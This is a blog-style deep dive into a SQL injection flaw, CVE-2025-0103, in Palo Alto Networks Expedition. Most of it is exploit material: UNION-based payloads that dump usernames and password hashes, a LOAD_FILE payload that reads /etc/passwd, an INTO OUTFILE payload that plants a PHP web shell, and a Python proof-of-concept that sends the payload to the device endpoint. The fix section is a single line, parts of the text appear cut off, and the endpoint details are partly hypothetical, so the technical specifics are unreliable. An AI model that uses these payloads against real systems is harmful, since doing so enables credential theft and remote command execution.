CVE-2025-0103 - Undressing Palo Alto Networks Expedition – Deep Dive Into Critical SQL Injection and File Exploit

Palo Alto Networks’ *Expedition* is a migration and optimization tool trusted by countless organizations worldwide. But in early 2025, a storm broke with CVE-2025-0103 — a severe SQL injection flaw that cracks Expedition wide open for authenticated users. They can exfiltrate passwords, usernames, device configurations, API keys, and even create or grab arbitrary files on the filesystem.

In this post, we’ll break down CVE-2025-0103 in plain English, show proof-of-concept code, and detail the exploit vector — all so you can patch fast or defend before real-world attack groups weaponize it.

1. What is Palo Alto Networks Expedition?

Expedition (previously called the Migration Tool) helps users migrate configurations from third-party firewalls to Palo Alto devices and optimize their policies. Expedition is typically deployed on-premise as a Linux VM. Security is critical, as it often handles confidential network policies and credentials.

2. The Vulnerability: CVE-2025-0103 Explained

A weakness exists in how Expedition handles certain authenticated web requests. Some endpoints take user-supplied input and directly embed it into SQL queries without proper sanitization or prepared statements.

API keys and integration data

- File manipulation: Attackers can abuse this vulnerability to read or create arbitrary files on the Expedition VM.

Impact:
While access requires a valid Expedition user account, many deployments give admin-level access widely or tie authentication to core IT systems. A malicious insider — or any attacker with a foothold — can escalate access, steal secrets, and potentially pivot to other systems.

3. Technical Details & Proof-of-Concept

Expedition’s backend uses PHP and MySQL/MariaDB. Several HTTP POST endpoints accept arbitrary keys used directly in SQL statements.

A common vulnerable pattern (simplified)

// Vulnerable PHP pseudocode
$id = $_POST['id'];
$sql = "SELECT * FROM devices WHERE id = '$id'";
$result = $db->query($sql);  // Not using parameterized/prepared query!

An attacker submitting crafted id input can manipulate the query logic to extract sensitive data — classic SQL injection.

a. Stealing Password Hashes

Suppose an endpoint /api/getDevice expects a POST like { "id": "7" }.

Instead, the attacker supplies

{ "id": "7' UNION SELECT 1,username,password,4,5 from users -- " }

The resulting SQL

SELECT * FROM devices WHERE id = '7' UNION SELECT 1,username,password,4,5 from users -- '

*Now, the users' table data gets returned to the attacker!*

Some Expedition SQL queries leverage the LOAD_FILE() MySQL function

SELECT LOAD_FILE('/etc/passwd')

Payload in POST

{ "id": "1' UNION SELECT 1,LOAD_FILE('/etc/passwd'),3,4,5 -- " }

c. Creating Files

With MySQL’s INTO OUTFILE, attackers can try to write files as well — for webshell placement (if directory is writable):

{ "id": "1' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php' -- " }

*Note: This step may depend on DB configuration and filesystem permissions.*

4. Live Exploit Demo (Python PoC)

*For educational/defense use only.*

import requests

# Expedition URL and credentials
url = 'https://expedition.example.com/api/getDevice';
headers = {'Content-Type': 'application/json'}
cookies = {'PHPSESSID': 'YOUR_SESSION_ID_HERE'}  # Must be authenticated

# Injected payload to leak users table
payload = {
    "id": "7' UNION SELECT 1,username,password,4,5 FROM users -- "
}

r = requests.post(url, json=payload, headers=headers, cookies=cookies, verify=False)
print(r.text)

# For file read, swap payload to use LOAD_FILE('/etc/passwd')

5. How To Fix

- Update: Palo Alto Networks has patched this vulnerability in Expedition release notes. Upgrade to the latest version (check official patch page for details).

6. References & Official Sources

- Palo Alto Networks Expedition Home
- Expedition Release Notes – Patch Details
- NVD Entry for CVE-2025-0103
- OWASP SQL Injection Cheat Sheet

7. Final Thoughts

CVE-2025-0103 is a wake-up call for anyone running Expedition quietly in the back-office or buried deep in your network zone. SQL injection is a classic — but when it hits modern admin tools, the impact can be devastating. Patch today, audit user access, and scan your logs for telltale signs that someone’s been poking around your backend database.

Timeline

Published on: 01/11/2025 03:15:22 UTC